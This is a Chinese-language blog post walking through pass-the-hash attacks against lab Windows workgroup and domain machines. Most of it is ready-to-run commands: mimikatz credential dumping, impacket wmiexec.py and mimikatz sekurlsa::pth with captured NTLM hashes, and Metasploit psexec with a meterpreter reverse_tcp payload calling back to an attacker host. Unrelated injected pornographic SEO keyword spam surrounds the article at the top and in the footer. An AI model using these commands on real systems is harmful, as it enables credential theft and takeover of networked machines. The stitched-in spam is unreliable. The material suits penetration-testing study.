<output id="qn6qe"></output>

    1. <output id="qn6qe"><tt id="qn6qe"></tt></output>
    2. <strike id="qn6qe"></strike>

      亚洲 日本 欧洲 欧美 视频,日韩中文字幕有码av,一本一道av中文字幕无码,国产线播放免费人成视频播放,人妻少妇偷人无码视频,日夜啪啪一区二区三区,国产尤物精品自在拍视频首页,久热这里只有精品12

      哈希傳遞

      關于哈希傳遞

      哈希傳遞攻擊是一種技術,攻擊者無需解密哈希即可獲得純文本密碼。PTH攻擊利用身份驗證協議,因為密碼哈希對于每個會話都保持靜態,直到密碼被轉換為止。攻擊者通常通過抓取系統的活動內存和其他技術來獲取哈希。

      kerberos中AS-REQ階段的Authenticator是由用戶密碼Hash加密的,如果得到了某臺主機的Administrator用戶的LM-Hash和NTLM-Hash ,并且該主機的445端口打開著。則可以利用哈希傳遞。

      (注意:只能是administrator用戶的LM-Hash和NTLM-hash。其他本地管理員都不行

      PS:密碼Hash中冒號前半段為LM Hash,冒號后半段為NTLM Hash,由于LM Hash算法被棄用,NTLM Hash被用來進行Windows本地及遠程身份驗證的憑據,長度為32bit、由數字和字母組成。

      利用:

      域:hiro.com
      域控:WIN-KONG@192.168.228.10 域管:administrator
      域機器: WINis10@192.168.228.40 本地管理員:administrator,aspnet

      在工作組環境中:

      只能是administrator用戶的哈希值才能進行哈希傳遞攻擊,其他用戶(包括管理員用戶但是非administrator)也不能使用哈希傳遞攻擊,會提示拒絕訪問。

      使用wmiexec.py(impacket套件)

      先使用mimikatz獲取administrator密碼hash:

      mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit">resuit.txt

      使用administrator的hash進行哈希傳遞:

      python3 wmiexec.py -hashes 00000000000000000000000000000000:fe2b69e500ee7324ae4749638074f6fe administrator@192.168.228.40

      使用本地管理員aspnet的hash進行哈希傳遞:(失敗)

      python3 wmiexec.py -hashes 00000000000000000000000000000000:e9ff43f2599f4986d362b4203996af5d aspnet@192.168.228.40
      image

      使用mimikatz

      mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit">resuit.txt

      sekurlsa::pth /user:administrator /domain:192.168.228.40 /ntlm:e9bf196dc93a1219e3b2e79b1b7aa36e

      成功后會自動彈出一個system權限的shell
      image

      在域環境中:

      只能是域管理員組內用戶(可以是域管理員組內非administrator用戶)的哈希值才能進行哈希傳遞攻擊,攻擊成功后,可以訪問域內任何一臺機器。

      使用wmiexec.py(impacket套件)

      mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit">resuit.txt

      python3 wmiexec.py -hashes 00000000000000000000000000000000:e9bf196dc93a1219e3b2e79b1b7aa36e administrator@192.168.228.10
      image

      使用mimikatz

      mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit">resuit.txt

      sekurlsa::pth /user:administrator /domain:hiro.com /ntlm:e9bf196dc93a1219e3b2e79b1b7aa36e

      成功后會自動彈出一個system權限的shell
      image

      使用msf

      msf進行pth攻擊(工作組)

      msf > use exploit/windows/smb/psexec

      msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp

      msf exploit(psexec) > set lhost 192.168.228.110

      msf exploit(psexec) > set rhost 192.168.228.40

      rhost可以是一個主機,也可以設置一個網段。

      msf exploit(psexec) > set smbuser Administrator

      msf exploit(psexec) > set smbpass 00000000000000000000000000000000:fe2b69e500ee7324ae4749638074f6fe

      msf exploit(psexec) > exploit

      msf進行哈希傳遞攻擊(域)

      當我們獲取到了域 管理員組內用戶的密碼哈希值,并且該主機的445端口打開著,我們則可以利用exploit/windows/smb/psexec用msf進行哈希傳遞攻擊。

      msf5 exploit(multi/handler) > use exploit/windows/smb/psexec

      msf5 exploit(windows/smb/psexec) > set lhost 192.168.228.110

      msf5 exploit(windows/smb/psexec) > set rhost 192.168.228.10

      msf5 exploit(windows/smb/psexec) > set smbuser administrator

      msf5 exploit(windows/smb/psexec) > set smbpass 00000000000000000000000000000000:e9bf196dc93a1219e3b2e79b1b7aa36e

      msf5 exploit(windows/smb/psexec) > exploit
      image

      KB2871997補丁的影響

      目標主機需要安裝KB2871997補丁,且只適用于域環境,而且就算打了這個補丁,administrator(SID=500)這個用戶也是可以進行哈希傳遞的

      posted @ 2021-03-22 20:12  cAr7n  閱讀(653)  評論(0)    收藏  舉報
      主站蜘蛛池模板: 亚洲另类无码一区二区三区| 国产成人亚洲精品自产在线| 欧美成人www免费全部网站| 韩国无码AV片午夜福利| 色综合AV综合无码综合网站| 胶州市| 亚洲精品成人老司机影视| 亚洲中文字幕五月五月婷| 国产老熟女国语免费视频| 午夜三级成人在线观看| 又大又粗又爽的少妇免费视频 | 在线a级毛片无码免费真人| 伊伊人成亚洲综合人网香| 夜夜躁日日躁狠狠久久av| 国产在线播放专区av| 潢川县| 成熟妇女性成熟满足视频| 婷婷久久综合九色综合88| 精品久久久久久久中文字幕| 国产午夜一区二区在线观看| 色综合视频一区二区三区| av在线网站手机播放| 欧美日韩精品一区二区三区高清视频| 国产SM重味一区二区三区| 国内熟妇人妻色在线视频| 欧洲无码一区二区三区在线观看| 亚洲国产午夜理论片不卡| 亚洲最大成人av免费看| 日本中文字幕乱码免费| 国产女同一区二区在线| 国产精品午夜福利导航导| 国产精品久久久久久久久软件| 在线精品国产中文字幕| 精品人妻伦一二三区久久aaa片| 成年在线观看免费人视频| 德江县| 毛片内射久久久一区| 中文字幕国产精品二区| 妺妺窝人体色www婷婷| 国产自产对白一区| 久久一日本综合色鬼综合色|